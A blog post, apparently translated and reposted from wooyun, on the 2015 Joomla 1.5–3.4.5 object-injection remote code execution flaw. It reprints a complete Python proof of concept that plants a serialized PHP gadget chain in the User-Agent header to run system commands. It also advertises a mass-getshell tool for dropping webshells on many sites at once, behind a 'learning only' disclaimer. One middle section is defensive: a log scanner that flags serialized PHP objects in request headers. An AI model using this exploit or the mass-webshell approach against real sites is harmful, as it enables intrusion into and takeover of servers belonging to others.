
JOOMLA 1.5 – 3.4.5 Remote Code Execution: Mass GETSHELL

2015-12-17 - Joomla, Vulnerability Alert

Everything I've seen people post works one target at a time, so I'll humbly offer a mass-getshell version; if you don't like it, please don't flame!

0x01 Background
Recently a remote code execution vulnerability was disclosed in Joomla 1.5 – 3.4.5. Its impact is considerable, and the various security organizations have all published analysis reports and PoCs, so the author will not repeat them here. For the related vulnerability analyses, see:

Joomla Object Injection Vulnerability Analysis Report

Joomla Remote Code Execution Vulnerability Analysis

Joomla Object Injection Vulnerability Analysis (Including Exploitation Method)

Joomla 1.5 – 3.4.5 – Object Injection Remote Command Execution

0x02 Exploitation
Below is the exp script that was published on exploit-db:

'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''

import requests  # easy_install requests


def get_url(url, user_agent):
    # The serialized payload travels in the User-Agent header; the first
    # request obtains a session cookie and the next three replay it.
    headers = {
        'User-Agent': user_agent
    }
    cookies = requests.get(url, headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers, cookies=cookies)
    return response


def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))

    return encoded[:-1]


def generate_payload(php_payload):
    # Wrap the PHP in eval() with no quote characters, then splice it into
    # the serialized object graph that the session layer will unserialize.
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))

    terminate = '\xf0\xfd\xfd\xfd'
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template


pl = generate_payload("system('touch /tmp/fx');")

print(get_url("http://172.31.6.242/", pl))
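The PoC above delivers a serialized PHP object graph in the User-Agent header and relies on Joomla's session layer storing and later unserializing it. From the defender's side, the same property makes the attempt visible in ordinary web-server logs. The following is an added example, not code from the original post or from exploit-db: it parses Apache combined-format access-log lines, unescapes the User-Agent field, and flags any request whose User-Agent carries a PHP serialized object header (`O:<n>:"Class":<m>:{`), recording the class names present (matched against the gadget classes named in the PoC) and whether `assert` appears. The log lines are constructed for the demo, and all regexes and function names are this example's own assumptions, not Joomla's.

```python
import re
from typing import Dict, List

# Constructed Apache "combined" access-log lines for the demo (not from the
# original post; IPs from the documentation range, timestamps made up).
# Apache writes double quotes inside the User-Agent field as \" .
SAMPLE_LOG = r'''203.0.113.10 - - [17/Dec/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/42.0"
203.0.113.11 - - [17/Dec/2015:10:00:02 +0000] "GET / HTTP/1.1" 200 4321 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:19:\"cache_name_function\";s:6:\"assert\";}"
203.0.113.12 - - [17/Dec/2015:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 8765 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/47.0"
203.0.113.13 - - [17/Dec/2015:10:00:04 +0000] "GET / HTTP/1.1" 200 4321 "-" "O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}}"
'''

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent".
# Each quoted field may contain backslash-escaped characters.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# A PHP serialized object header: O:<len>:"<class>":<props>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"([^"]+)":\d+:\{')

# Class names that appear in the gadget chain used by the published PoC.
GADGET_CLASSES = ("JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                  "JSimplepieFactory", "SimplePie")


def unescape_field(value: str) -> str:
    """Undo Apache's log escaping of quotes and backslashes."""
    return value.replace('\\"', '"').replace('\\\\', '\\')


def inspect_user_agent(ua: str) -> Dict[str, object]:
    """Return indicators of PHP object injection found in one User-Agent value."""
    classes = PHP_OBJECT_RE.findall(ua)
    return {
        "objects": len(classes),
        "classes": classes,
        "gadgets": [c for c in classes if c in GADGET_CLASSES],
        "uses_assert": '"assert"' in ua,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """Flag every request whose User-Agent carries a serialized PHP object."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        ua = unescape_field(m.group("ua"))
        info = inspect_user_agent(ua)
        if info["objects"] == 0:
            continue
        hits.append({"ip": m.group("ip"), "ts": m.group("ts"), **info})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], "objects=%d" % hit["objects"],
              "gadgets=%s" % ",".join(hit["gadgets"]),
              "assert" if hit["uses_assert"] else "")
```

Two caveats. The `O:<n>:"..."` header is the generic signal; the gadget class list only adds confidence for this particular chain, so treat any serialized object in a client-supplied header as suspicious even when the class names differ. Second, the PoC shown here uses User-Agent, but Joomla's session code also persisted the X-Forwarded-For header, which a default combined log does not record; inspecting request headers at the web server or WAF, together with moving to a release that filters these values before storing them, covers both paths.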

Based on the script above, the author rewrote it into a mass-getshell script.

[screenshot of the rewritten script]

Run the command python hackUtils.py -r [url file] to obtain webshells in one step:

[screenshots of the script running and the resulting webshells]

Script location: link

Disclaimer: for learning purposes only; nobody may use this for illegal purposes, otherwise the consequences are their own responsibility!

Reposted from wooyun: link